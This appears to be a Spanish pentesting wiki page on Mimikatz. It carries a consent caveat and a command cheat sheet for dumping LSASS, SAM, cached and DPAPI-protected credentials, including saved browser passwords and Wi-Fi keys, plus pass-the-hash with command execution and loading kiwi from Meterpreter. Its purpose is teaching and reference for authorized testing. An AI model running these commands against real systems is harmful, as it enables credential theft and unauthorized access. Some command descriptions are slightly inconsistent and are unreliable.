🐈Mimikatz

Mimikatz es una herramienta popular entre los hackers, ya que puede recuperar contraseñas almacenadas en texto claro o en forma de hash. Tiene un montón de opciones para extraer información.

AnteriorMeterpreter SiguienteLaZagne

Última actualización hace 3 meses

🐈Mimikatz

Mimikatz es una herramienta popular entre los hackers, ya que puede recuperar contraseñas almacenadas en texto claro o en forma de hash. Tiene un montón de opciones para extraer información.

Nota: Este tipo de técnicas son muy invasivas, ya que vamos a conseguir información sensible, por lo que no podemos utilizar estas técnicas sin un consentimiento o aprobación por parte del objetivo

Principales Comandos

privilege::debug: Este comando se utiliza para habilitar la depuración en el proceso actual, lo que permite a Mimikatz obtener acceso a las credenciales del sistema.

sekurlsa::logonPasswords: Este comando se utiliza para recuperar las contraseñas almacenadas en el archivo LSASS.exe, que es el proceso responsable de la gestión de credenciales en sistemas Windows.

lsadump::sam: Este comando se utiliza para recuperar las contraseñas almacenadas en el archivo SAM, que es la base de datos de cuentas locales en sistemas Windows.

lsadump::cache: Este comando se utiliza para recuperar las credenciales almacenadas en la caché de credenciales del sistema.

lsadump::secrets: Este comando se utiliza para recuperar las credenciales almacenadas en el archivo SYSTEM, que es un archivo que contiene información sobre la configuración del sistema.

token::elevate: Este comando se utiliza para obtener privilegios elevados en el sistema actual.

Cheatsheet

Comando Descripción

Comando	Descripción
`privilege::debug`	Habilita los privilegios de depuración en el contexto actual.
`privilege::getprivs`	Muestra los privilegios disponibles en el sistema.
`sekurlsa::logonpasswords`	Muestra las contraseñas en texto plano almacenadas en LSASS (Local Security Authority Subsystem Service).
`sekurlsa::tickets /export`	Enumera los tickets de Kerberos en el sistema y los exporta a un archivo.
`sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlmhash>`	Realiza un Pass-the-Hash (PTH) con el hash NTLM proporcionado.
`sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlmhash> /run:<command>`	Realiza un Pass-the-Hash (PTH) y ejecuta un comando utilizando las credenciales obtenidas.
`sekurlsa::wdigest`	Muestra las contraseñas almacenadas en LSASS en formato WDigest.
`sekurlsa::ekeys`	Muestra las claves de cifrado de Kerberos almacenadas en LSASS.
`lsadump::lsa`	Muestra información sobre la Política de Seguridad Local (LSA) del sistema.
`lsadump::sam`	Muestra las cuentas de usuario almacenadas en la base de datos SAM (Security Accounts Manager).
`lsadump::secrets`	Muestra los secretos almacenados en LSASS, como claves de máquina y otros datos sensibles.
`lsadump::cache`	Muestra las credenciales almacenadas en la caché de autenticación de Windows.
`dpapi::masterkey`	Muestra las claves maestras DPAPI (Data Protection API) almacenadas en el sistema.
`dpapi::cred`	Muestra las credenciales DPAPI protegidas almacenadas en el sistema.
`dpapi::chrome`	Muestra las credenciales guardadas por Google Chrome utilizando DPAPI.
`dpapi::firefox`	Muestra las credenciales guardadas por Mozilla Firefox utilizando DPAPI.
`dpapi::ie`	Muestra las credenciales guardadas por Internet Explorer utilizando DPAPI.
`dpapi::credhist`	Muestra el historial de credenciales de usuario protegidas por DPAPI.
`crypto::capi`	Enumera las claves y los certificados almacenados en el almacén de claves de Windows.
`crypto::certificates /export`	Exporta los certificados del almacén de certificados de Windows a archivos individuales.
`crypto::keys /machine`	Enumera las claves criptográficas de máquina almacenadas en el sistema.
`crypto::keys /user`	Enumera las claves criptográficas de usuario almacenadas en el sistema.
`vault::list`	Enumera los elementos almacenados en el Vault de Windows, como credenciales de Internet Explorer y Edge.
`vault::cred /patch`	Enumera las credenciales protegidas almacenadas en el Vault de Windows.
`vault::cred /export`	Exporta las credenciales protegidas almacenadas en el Vault de Windows a archivos individuales.
`token::elevate`	Intenta elevar los privilegios del token del proceso actual al nivel de "System".
`token::list /export`	Enumera los tokens de seguridad en el sistema y los exporta a un archivo.
`misc::cmd`	Ejecuta comandos en un símbolo del sistema.
`misc::memssp`	Carga el módulo MemSSP.dll para interceptar credenciales en memoria.
`misc::screenshot`	Toma una captura de pantalla del escritorio del usuario actual.
`misc::wifi`	Enumera los perfiles de Wi-Fi almacenados en el sistema y muestra sus contraseñas.

privilege::debug

Habilita los privilegios de depuración en el contexto actual.

privilege::getprivs

Muestra los privilegios disponibles en el sistema.

sekurlsa::logonpasswords

Muestra las contraseñas en texto plano almacenadas en LSASS (Local Security Authority Subsystem Service).

sekurlsa::tickets /export

Enumera los tickets de Kerberos en el sistema y los exporta a un archivo.

sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlmhash>

Realiza un Pass-the-Hash (PTH) con el hash NTLM proporcionado.

sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlmhash> /run:<command>

Realiza un Pass-the-Hash (PTH) y ejecuta un comando utilizando las credenciales obtenidas.

sekurlsa::wdigest

Muestra las contraseñas almacenadas en LSASS en formato WDigest.

sekurlsa::ekeys

Muestra las claves de cifrado de Kerberos almacenadas en LSASS.

lsadump::lsa

Muestra información sobre la Política de Seguridad Local (LSA) del sistema.

lsadump::sam

Muestra las cuentas de usuario almacenadas en la base de datos SAM (Security Accounts Manager).

lsadump::secrets

Muestra los secretos almacenados en LSASS, como claves de máquina y otros datos sensibles.

lsadump::cache

Muestra las credenciales almacenadas en la caché de autenticación de Windows.

dpapi::masterkey

Muestra las claves maestras DPAPI (Data Protection API) almacenadas en el sistema.

dpapi::cred

Muestra las credenciales DPAPI protegidas almacenadas en el sistema.

dpapi::chrome

Muestra las credenciales guardadas por Google Chrome utilizando DPAPI.

dpapi::firefox

Muestra las credenciales guardadas por Mozilla Firefox utilizando DPAPI.

dpapi::ie

Muestra las credenciales guardadas por Internet Explorer utilizando DPAPI.

dpapi::credhist

Muestra el historial de credenciales de usuario protegidas por DPAPI.

crypto::capi

Enumera las claves y los certificados almacenados en el almacén de claves de Windows.

crypto::certificates /export

Exporta los certificados del almacén de certificados de Windows a archivos individuales.

crypto::keys /machine

Enumera las claves criptográficas de máquina almacenadas en el sistema.

crypto::keys /user

Enumera las claves criptográficas de usuario almacenadas en el sistema.

vault::list

Enumera los elementos almacenados en el Vault de Windows, como credenciales de Internet Explorer y Edge.

vault::cred /patch

Enumera las credenciales protegidas almacenadas en el Vault de Windows.

vault::cred /export

Exporta las credenciales protegidas almacenadas en el Vault de Windows a archivos individuales.

token::elevate

Intenta elevar los privilegios del token del proceso actual al nivel de "System".

token::list /export

Enumera los tokens de seguridad en el sistema y los exporta a un archivo.

misc::cmd

Ejecuta comandos en un símbolo del sistema.

misc::memssp

Carga el módulo MemSSP.dll para interceptar credenciales en memoria.

misc::screenshot

Toma una captura de pantalla del escritorio del usuario actual.

misc::wifi

Enumera los perfiles de Wi-Fi almacenados en el sistema y muestra sus contraseñas.

Cargar desde Meterpreter

load kiwi
help kiwi (saca todas las opciones)

Volcado de contraseñas

kiwi_cmd sekurlsa::logonPasswords